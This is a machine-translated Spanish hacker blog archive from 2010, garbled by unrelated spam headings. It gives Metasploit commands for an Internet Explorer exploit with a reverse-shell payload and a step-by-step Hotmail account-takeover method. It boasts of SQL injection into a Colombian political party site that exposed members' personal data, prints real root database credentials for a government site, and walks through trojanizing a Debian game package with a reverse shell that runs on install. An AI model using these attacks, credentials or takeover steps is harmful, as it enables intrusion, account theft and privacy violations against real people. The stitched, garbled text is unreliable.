Wednesday, December 29, 2010

Flash Games Furry Yaoi

h4x0rs friends Happy New Year!




This year ... was a year of great experiences, great discoveries and most importantly, meet great friends that during time I've been ON, either through Facebook or by hacker.net have made me laugh, think and feel important, not ego
XD-
. They are:

h4x0rs and many more, just that I have good communication as I have mind the characters mentioned above. Greetings and Happy New Year to all my friends, acquaintances and fans of this little blog.
Friends: M essermitch VISUALcero -the-Dariohxc -King in the prone- Root Shell , Progressive Death , the most queer- Break-the JAVAcero .

Friday, December 24, 2010

New Hire Announcements Examples

[0 Day] CER in Internet Explorer 6, 7 and 8


INFORMATION:
Microsoft issued a bulletin reporting a
vulnerability (CVE-2010-3962)

affecting several of the supported versions of Internet Explorer 6, 7 and 8, which are investigating and so far no solution has a patch.

The main impact of this vulnerability can lead to remote code execution (RCE

-Remote Code Execution-) . Microsoft The newsletter provides workarounds to avoid the threat, which are:


Avoid CSS style site using CSS styles defined by the user.
    Using the toolkit EMET. Use
  • DEP for IE 7. Read
  • mail in text mode. Set
  • areas Intranet and Internet security mode "High" to block ActiveX controls and Active Scripting in these zones.
  • also reported that Internet Explorer 9 (Beta) is not affected and can be used without problems. In the case of Internet Explorer 8 in its default installation is unlikely to be affected, since it offers protection from DEP.



module exploits a memory corruption vulnerability in Microsoft HTML engine (MSHTML). When parsing an HTML page containing a specially crafted CSS tag causes memory corruption which leads to arbitrary code execution.


Exploit:

# use exploit/windows/browser/ms10_xxx_ie_css_clip
#
 

Payload:

# September PAYLOAD windows / meterpreter / reverse_tcp
#
 

Commands the Metasploit:

# use clip exploit/windows/browser/ms10_xxx_ie_css_
September September
 payload IP SRVHOST windows / meterpreter / IP Lhoste reverse_tcp 
September

#

exploit
Video:
Due to some problems with my machines virtual, I chose to put a video of a third party.


Tuesday, December 21, 2010

Teco Air Conditioner Manual

bug mail The alternative [Hotmail]

HOTMAIL

Viewing
blogs of my friends did not remember what days earlier had seen a very striking with the name "The alternative mail bug" and now I got to try and very good results.

Let's at issue:

When we register a new email account on Hotmail, it requires a field "Alternate Email" for possible restoration password This field allows you to enter any email, whether or not there
that account
.

Now we mentioned how to exploit this bug, we will select a target:
xxx@hotmail.com
, enter the page maccount.live.com and have a window like the following:
Figure 1: Selecting Select the option

password reset option .
Forgot your password?
then a window will have to fill 2 fields, the first target of the mail account and the second with a captcha. Something like this:

Figure 2: Entering
target and captcha.

The following page will be 2 options,
, depending on the information entered when creating the email account
, one of them is that we use to get total control email account target, this option is Reset your password, email .

Figure 3: Selection
password reset method.

But now, tell us why:
to continue with steps to restore password, send an email to the email alternative procedure.
But what the hell, we only show the first 2 letters of alternative mail, as we do to get your entire account. Looking at the source code, you see something interesting hidden fields! and Voala! one is the alternate email account.

Figure 4: Obtaining
alternative mail, through hidden fields on the form.

now have a 50% chance of seizing the original mail account, we can only hope and pray that the alternate email account is not created or are created, we hope to that downtime in this account is in a disabled state. Go to the homepage hotmail \u0026lt;

login.live.com > and try to create alternative email account obtained.
Figure 5:

status check alternate email account.

But what the hell, put my alternate email account and no, I can create that account. Now we have a 100% chance to seize the main target. We created the account, and perform the steps above to send us the following steps to the email account you just created.


Account Login we create, and look that there is a mail
Password Reset Windows Live
.

Figure 6:
Hosting mail for password reset.

Now we can only follow the steps,



Figure 7: Entering the Easy, right?.
new password for the main target.

Greetings to "
someone."

Monday, December 20, 2010

Nature Valley Crunchy Granola From Mcdonalds

Conservative Party Colombia - Disclosure of private information

CONSERVATIVE PARTY COLOMBIAN
DISCLOSURE OF PRIVATE INFORMATION


Long after the vote will, I entered curious to verify the safety of the pages of political parties, obviously my country of origin, and after several attempts on other sites

BINGO! I was able to inject SQL code to get the tables, fields and records, so now I have left to do 2 things. The first, decrypted the hash unfortunately this MD5 and second, find the admin panel
-what in some cases is more hidden than osama bin laden-
. In my first step, I found dead in the first user, the hash was not in any databases decrypted my pages you preferred to MD5, but hell I'm lucky in the second user, I did decrypted password. Now I am ready to find the admin panel. With a good dictionary, I start my "Admin Panel Finder" -coded in perl- and Voala! I have also luck and a lapse of time of about 15 minutes get everything you need to log in as a super user and try to find private information -which is what I mainly wanted to do-.

and I'm about to get much satisfaction to see:

Figure 1: I logged as
After logon to data produced by iSQL
Fernando Murgueitio (Super Administrator) . Let's continue our search for information, enter the section menu "Card party" and see who comes a long list of user with their respective personal information.

Figure 2:
List all users with personal information of each.

Saturday, December 18, 2010

Impetigo Benzyl Peroxide

interesting ways to use Nmap



Get information from a host remote sensing of SO
  1. nmap-sS-P0-sV-O-sS \u0026lt;address>
    TCP SYN scan =
     
    (or stealth scan) -P0 = not send ICMP pings
    -sV = detected
    versions -O = attempts to identify the operating system
    Other options:
    -A = enable OS fingerprinting and version detection
    -v = used twice-v for more details
    List servers with a specific port open
  2. nmap-sT-p 80-oG - 192.168.1 .* detect active IP's on a network
     
    nmap-sP 192.168.0 .* nmap-sP 192.168.0.0/24

  3.  Ping a range of IP's 

    192.168.1.100-254 nmap-sP
  4. Find
    unused IP addresses in a subnet
     

    nmap-T4-sP 192.168.2.0/24 & & egrep "00:00:00:00:00:00" / proc / net / arp

  5. Virus Scan for
     conficker 

    nmap-PN-T4-P139, 445-n-v-script = smb-check-vulns-script-args = 1 192.168.0.1-254
  6. safe
  7. Scan network for AP
    false
     
    nmap-A-p1-85 ,113,443,8080-8100-T4-50-hostgroup min-max-rtt-timeout 2000-initial-rtt-timeout 300-max-retries 3-host-timeout-max-scan 20m 1000-oA-delay wapscan 10.0.0.0 / 8

  8. Create a lure for port scanning to avoid detection
     

    nmap-sS 192.168.0.2 192.168.0.10-D scans
  9. node ports 192,168
  10. .1.10 spoofea while the IP 192.168.0.2
    as
     attacker node (the IP must be active) will seem so 
    the scan is run from the IP 192.168.0.2 (the ip spoofed) . Check the logs in / var / log / secure to check if it has to operate normally. List reverse DNS records from one subnet
    nmap-sL-R 209.85.229.99/27
  11. many nodes with few Linux and Windows is on a network
     nmap-F-O 192.168.0.1-255  Disclosure 
    (FSD) , so I decided to look at some sites and the first surprise was the ombudsman the public of Colombia re
    "My country of origin,
  12. and so great was my surprise to run my first request, PLOP, you download a file and look for on the original code was, after a few minutes I could find the exact path where the connection to the database,
  13. -what really interested us Here I leave:
     \u0026lt;? 
    / / List of functions for connecting different databases
  14. # Connect to communications function
db_connectcom ()
{$ link = @ mysql_connect ("localhost", "root", "oburgos"); ($ link) if ($ link & & mysql_select_db ("Communicated")) return ; return (FALSE);} db_newsconnect function () {

$ link = @ mysql_connect ("localhost", "root", "oburgos");

if ($ link & ; & mysql_select_db ("Noticias")) return ($ Link); return (FALSE);}

# Connect to reports db_connectinf function () {

$ link = @ mysql_pconnect ("localhost", "root", "oburgos");
if ($ link & & mysql_select_db ("reports")) return ($ link); return (FALSE);} # Connect to resolutions db_resconnect function () { $ link = @ mysql_pconnect (" ; localhost "," root "," oburgos "); if ($ link & & mysql_select_db ("resolución")) return ($ link); return (FALSE);}

/ / Foros
 db_foros function () {

$ link = mysql_connect @ (" ; localhost "," root "," oburgos ");
if ($ link & & mysql_select_db (" link Foro "))
return ($);
return (FALSE);}

/ / encuesta encuestas
function () {

$ link = @ mysql_connect ("localhost", "Root", "oburgos");
link if ($ link & & mysql_select_db ("encuestas"))
return ($);
return (FALSE);}

/ / OJC OJC
function ()

{$ link = @ mysql_connect ("localhost", "root", "oburgos"); ($ link)
if ($ link & & mysql_select_db ("OJC")) return
;
return (FALSE);}

/ / código de procedimiento
function cpp ()

{$ link = @ mysql_connect ("localhost", "root", "oburgos");
if ($ link & & mysql_select_db ("cpp"))
return ($ link );
return (FALSE);}

/ / historia - DP
hdp function () {

$ link = @ mysql_connect ("localhost", "root", "oburgos");
if ($ link & & mysql_select_db ("def_publica"))
return ($ link);
return (FALSE);}

/ / System sn_def News
function () {

$ link = @ mysql_connect ("localhost", "root", "oburgos");
if ($ link & ; & mysql_select_db ("noticias2007"))
return ($ link);
return (FALSE);}

?>

But unfortunately the MySQL server is local and can not connect remotely to it.

Greetings!


Tuesday, December 14, 2010

Kitchen Table Decorating Ideas French

The Ombudsman's Office - Republic of Colombia [Full Disclosure Source]


guess this will be the question many people are going to do when you the shock wave reaches the assumed name of the member





An0nymous of 4Chan



. The history of this name is surrounded by new, an aura of mystery and games as





Alex Tapanaris





is the name that appears as the creator of the PDF file has an0nymous


issued as press release



. I, as they have in
Need of Security , I passed the document by the FOCA , and these data are displayed. Figure 1: Metadata in the press release with FOCA an0nymous ... And now the fun begins. Once the news has spread like wildfire through twitter , has begun a brutal war of information across the Internet. Search Google shows results of "disinformation? "Insults because they are clear that is it? Figure 2: Google results ... pastebin much


In the sites that talk about this issue, the comments are like gunpowder, each with his theory, with its contribution, as they said in a message from a pastebin you see in the Google results,
for people to find this information when conducting searches
.
Figure 3: Commentary by the nickname false Julian Assange
To find some background information to this war, must be used to search for ranges, and avoid, of course, the actual dates, and the beginning of the
operation
Payback, and this is what you get. Figure 4: Results filtered by date

A
domain with that name from a Greek designer 3D
that still standing - and you should be getting a lot of visitors since that time - in which, go to bad luck, no information on about. Ni-mail address, or a contact form or the English or the Greek .... "Suspect? Figure 5: About
in Alextapaniris.com

domain's Whois information is fairly limited right now, allowing you to see very little information, so that non-response can perhaps be regarded as a response "?.

Figure 6: Results Whois As the domain takes a while, I thought maybe I could be something
Archive.org, the website that makes copies of web pages to see what they published in the past, but ... no, not a fact.

Figure 7: 0 results in archive.org
The question is ... the shit will be so foolishly with metadata? Yes, happened to Tony Blair, but this was not a hacker. I would be inclined, at first, to think not, and perhaps has been a game, as many claim. That has been a way to throw off the hounds
"pouring a bone
.
However, if it was a game, because something:

1) Generate a number of brutal results on the Internet to make them lose time. Here in Spain one Nick to put his name of a porn actor (hello, still somewhere?) For according to him, when to seek information from him on the internet taken out pretty pictures.

2) In order to aggravate someone. The fact is that the results of

Alex Tapanaris

are not many, with what we have left that option 2 would imply that such Tapanaris you done something and is suffering its own operation Payback?

The theory of Occam's razor, although it has been refuted by many philosophers, said that the simplest answer is most likely, would lead us to the first question. Is there really shit? ... Or really was tired of being an0nymous as a chunk is a shit and wants to face this way? What do you think?

Source:
http://www.elladodelmal.com/2010/12/tapaque.html

Islamic Message For Wedding Card

Tapaqué "?

How to decrypt file insurance.aes256 sure Wikileaks With all the hype is getting to ride Wikileaks (and the arrest of Assange ) have rekindled
issues that were in the background, as the alleged insurance Julian Assange life. For less posts on the subject, insurance is a strong file encryption Wikileaks distributed and whose encryption key is unknown. In the event that anything happened Julian Assange (presumably, upon his death), the encryption key is released and everyone could see the content.
What's inside is a mystery, according to Wikileaks is highly embarrassing information.

We will consider how to view the content of the file if the key is released.


commented Wikileaks Under the file is encrypted with AES Crypt AES - Rijndael
of 256 bits (Encryption is also used by the NSA

). The point is that there are suspicions
that, although well documented Wikileaks it really is not encrypted with AES Crypt. Personally I do not think that is encrypted with this software, but with OpenSSL


, but this we leave for later analysis. That said, let's see as
decrypt with both programs.

- Windows AES Crypt
[
Information - Download
]
- AES Crypt on GNU / Linux
[
Information - Download ]

Using the version of terminal also use is easy. Once compiled, but should be run as follows. aescrypt -D-p clave_de_cifrado insurance.aes \u200b\u200b

- OpenSSL
[Available in most Linux distributions and Unix-like systems]
The command is a little longer but the performance is similar.

openssl enc-d-AES256-out-in insurance.aes256 insurance_dec [We asked for a password and decrypt]

Okay, here's a guide to decipher, now
analysis
file and why not and if OpenSSL AES Crypt.

Most program when working with files, record them at the beginning of a header. This helps them identify their own files when they return to work with them, and sometimes make patterns and work with that file. Moreover, it often helps the system or users to know what kind of file it is (a picture, video, audio, etc ...), and thus treated with a program or another.
 

Let's take a look at the first bytes of the file insurance.aes256 to see how your physician. Eye on the right side, where we see the ASCII characters.


 Now let's encrypt any file with AES Crypt and secondly with OpenSSL, and we will see header of each of the encrypted files. 

header Crypt AES-encrypted file





As you can see The Wikileaks header file is similar to file encryption with OpenSSL. By contrast, the file header Crypt AES encryption is unlike anything since different data stores.

test If we try to decipher insurance.aes256 Crypt AES and a key is what happens invented.
The header is corrupt error, but not wrong key.

This article not intended to attack the credibility of Wikileaks, much less. Simply draws attention at first to document that the file had been encrypted with AES Crypt when it seems that it is not.
Either way, it is better to have on hand both programs for what might happen.

-

insurance.aes256 Download
http://insurance.pentbox.net/
[

Confirmed] Confirmed]

http://thepiratebay.org/search/insurance.aes256/0/99/0
[
Unconfirmed]
Source: http:/
/ www.securitybydefault.com/2010/12/como-se-descifraria-el-fichero-seguro.html

Are Kidney Stones More Painful Than Gallstones

How to decrypt file Wikileaks sure insurance.aes256


[Metasploit] Linux Trojan infecting
[Metasploit By: Shell Root]
, which became a payload into an executable file to infect Windows, now we will do mime, but to infect Linux.
To avoid suspicion downloading a game, in this case "Freesweep" to then infected with the payload.
shellroot @ shellroot-desktop: ~ $ sudo apt-get - download-only install freesweep [sudo] password for shellroot, Reading package lists ... Done Building dependency tree
Reading state information ...
Done The following packages will be upgraded: freesweep 1 upgraded, 0 newly installed, 0 to remove and 183 not upgraded. 39.2 kB need to download files. be used 172KB of additional disk space after this operation. Des mode
download only shellroot @ shellroot-desktop: ~ $

Create a folder where the files remain organized manner. In this case, will / home / shellroot /
shellroot @ shellroot-desktop: ~ $ mkdir / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ $

Now the file you downloaded to start the move inside the folder you just created
( / home / shellroot / Trojan ) .
shellroot @ shellroot-desktop: ~ $ sudo mv / var/cache/apt/archives/freesweep_0.90-2_i386.deb / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ $
We position ourselves within the folder / home / shellroot / Trojan modifcamos
and folder permissions.
 shellroot @ shellroot-desktop: ~ $ cd / home / shellroot / Trojan 
shellroot @ shellroot-desktop: ~ / Trojan $ chmod 777 / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ / Trojan $
Unzip

file-2_i386.deb freesweep_0.90
within
folder / home / shellroot / Trojan
to add the PAYLOAD infection.

shellroot @ shellroot-desktop: ~ / $ dpkg-x Trojan freesweep_0.90-2_i386.deb @ shellroot shellroot
Game-desktop: ~ / Trojan $

Now create a folder called Debian, within it create 2 files.
control postinst
shellroot @ shellroot-desktop: ~ / $ mkdir Game Trojan / DEBIAN
shellroot @ shellroot-desktop: ~ / $ cd Game Trojan / DEBIAN
 shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $ 
Within the control file, we will post the following information:
Package: freesweep Version: 0.90 to 1 Section: Games & Fun Priority: Medium
Architecture: i386
 Created: Ubuntu MOTU Developers (ubuntu-motu @ lists. ubuntu.com) 
Description: Minesweeper is an implementation of the popular minesweeper game, trying to find all the mines without igniting any, based on suggestions given by the team.

postinst now within the file, put a script for the execution of our infected file. # / bin / sh
sudo chmod 2755 / usr / games / freesweep_scores & & / usr / games / freesweep_scores & / usr / games / freesweep &
 
Now create the Trojan with linux/x86/shell/reverse_tcp PAYLOAD, give the parameters and lport Lhoste and ubucacion the infected file.
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $ msfpayload linux/x86/shell/reverse_tcp Lhoste = 192,168,142,137 lport = 1234 X> / home / shellroot / Trojan / Game / usr / games / freesweep_scores
Created by msfpayload (http://www.metasploit.com). Payload: linux/x86/shell/reverse_tcp Length: 50 Options: Lhoste = 192,168,142,137, lport = 1234 shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $
 modifcamos Now postinst file permissions , and build the file again who is supposedly the "Game". 
shellroot @ shellroot-desktop: ~ / Trojan / Game / postinst chmod 755 $ DEBIAN
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $ dpkg-deb - build / home / shellroot / Trojan / Game /
dpkg-deb: building package `freesweep 'to` / home / shellroot / Trojan / Juego.deb'.
shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $
Re-contruccion
 Juego.deb create the file which must change for freesweep.deb, so we move to the folder 
/ home / shellroot / Trojan
, then, we will move to the Web server root for your next shock and infection.

shellroot @ shellroot-desktop: ~ / Trojan / Game / DEBIAN $ cd / home / shellroot / Trojan
shellroot @ shellroot-desktop: ~ / Trojan $ mv Juego.deb freesweep.deb
 shellroot @ shellroot-desktop: ~ / Trojan freesweep.deb $ sudo cp / var / www / 
[sudo] password for shellroot:
shellroot @ shellroot-desktop: ~ / Trojan $

started the Apache Server

shellroot @ shellroot-desktop: ~ / $ Trojan sudo / etc/init.d/apache2 start
* Starting web server apache2 apache2: Could not reliably determine the server's fully qualified domain name, using 127.0.1.1 for ServerName
httpd (pid 1576) already running
[OK]
 shellroot @ shellroot-desktop: ~ / Trojan $ 
Now as when we did with Windows, we use the Auxiliary
multi / handler
, set in the same way that when we create the PAYLOAD and wait for the victim download and run the infected file.
 
shellroot @ shellroot-desktop: ~ $ sudo msfcli exploit / multi / handler PAYLOAD = linux/x86/shell/reverse_tcp Lhoste = 192,168,142,137
lport = 1234 E [sudo] password for shellroot:
[*] Please wait while we load the module tree ...
[*] Starting the payload handler ...
[*] Started on port 1234 reverse handler

Now suppose that we are the victim and download the file.
 hacklab @ hacklab-desktop: ~ $ wget http://192.168.142.137/freesweep.deb 
- 2010-01-21 23:36:27 - Connecting
http://192.168.142.137/freesweep.deb to 192.168.142.137:80 ... connected.
HTTP request sent, awaiting response ...
200 OK Length: 39,214 (38K) [application / x-debian-package]
Saving "freesweep.deb" 100 %[=================== ====================================>] 39,214 --.- K / s in 0s
 21/01/2010 23:36:29 (93.0 MB / s) - `freesweep.deb 'saved [39214/39214] 

hacklab @ hacklab-desktop: ~ $

After downloading the file, installed it.

hacklab @ hacklab-desktop: ~ $ sudo dpkg-i freesweep.deb
 
Now look at the multi / handler Voala
and a session of
Meterpreter

[*] Sending Stage (36 bytes) [* ] Command shell session 1 OPEN (192.168.142.137:1234 -> 192.168.142.140:41233)
 

Thursday, December 9, 2010

Quotes About Softball Pitcher Anxiety

[Metasploit] Linux Trojan infecting the first cyberwar




begins the first cyberwar era of information

 


The War of the information age, that is, multiple attacks and counterattacks
for
and
against WikiLeaks
through the Internet, has been launched by Army volunteers hackers. On Wednesday, they managed to lock the computer systems of two 'enemies' of the web, Visa and Mastercard, after the two block payments to the site created by Julian Assange.

'Operation Assange avenge' ('Operation Avenge Assange')-organized by Anonymus

following Wikileaks applied to the fence and its creator after filtration
thousands of diplomatic cables
- got a late morning break down some of Mastercard's computer systems,
 test the power of spontaneous movement through Internet. 

channel in IRC (Internet Relay Chat) from which the attack was directed against MasterCard, the moderator has established the title "Operation Payback. Objective: www.mastercard.com. There are some things you can do WikiLeaks. For what else is Operation Payback. " At noon the channel operators reported that more than 1,800 bots were flooded with distributed denial of service (DDOS) to www.mastercard.com. And the company acknowledged difficulties in some of their services
. 
'The war has begun'

Meanwhile, other channel users informed of progress of the attack with messages about the status of MasterCard transactions in countries as far away as Sweden
, Sri Lanka or Mexico or the evolution of the shares of the credit card company in the New York Stock Exchange.
"The first information war has begun. Send by Twitter and place it anywhere, "proclaimed one of the hackers. Others requested that the group directed their attacks PayPal, VISA and even the Fox News organization.
Through his Twitter account those responsible for the Anonymous group announced late in the day as the new target to attack was Visa. "Objetivo: www.visa.com. Shoot, shoot, shoot "while providing the data necessary to consummate the attacks. At 22 hours, reached Visa attacking. "Http://isitup.org/www.visa.com IT'S DOWN! Keep Firing! "(" He fell, still shooting "), announced Operation Payback to 22 hours on Twitter . Indeed, when trying to access the Visa page an error message appeared.

Attack PayPal Under Blog company Internet Security Panda, the group had attacked shortly after PayPal payment system Internet announcing the cancellation
WikiLeaks service to
though the attack was limited to a company blog.
After the attack, Paypal Wikileaks has given money donations that he had retained. According to Paypal, their decision was based solely on professional ethics
covered under their code of conduct.
For Paypal Wikileaks leaks, being secret documents related to U.S. State Department, understood to have obtained illegally, it is not consistent with company policy. For Paypal Wikileaks has violated U.S. laws and that is what has led him temporarily retain the funds, as explained above.
Panda said the DDOS attack against ThePayPalblog.com for 8 hours caused the blog suffer service interruptions 75.
'Anonymous' has also managed to seriously affect the operation of PostFinance, the Swiss bank has also blocked the
to WikiLeaks, and the Swedish law firm representing the two women who have accused Assange of ;
sexual abuse. "Although we are not affiliated with WikiLeaks, fighting for the same reasons. We want transparency and attacked censorship, "said the group before the end" we can not allow this to happen. "

This is not the first attack by 'Anonymous'. It is considered that the group has facilitated the identification and arrest of several predators, but perhaps one of his most famous was the so-called 'Project Chanology' initiated in 2008 to protest against the Church of Scientology. Following the protest, including denial of service attacks (DDOS) and those who are suffering now Mastercard, the group adopted the aesthetics of comics 'V for Vendetta', in which thousands of citizens use identical mask to avoid identification by the authorities. Last year, 'Anonymous' also joined the protests against the Iranian elections. This group is the same as
blocked pages
SGAE and the Ministry of Culture last October. In their protests, 'Anonymous' has described his attack as 'Operation Payback' (Operation Vengeance) but since we started publishing WikiLeaks cables American diplomacy and the website began to suffer harassment and
business
governments, 'Anonymous' decided launch "Operation Come Assange."
"WikiLeaks is off by distributed denial of service (DDOS). There is reason to believe that the U.S. is behind because of the nature of the leak on Sunday 28 November, "the group said on its website. Seen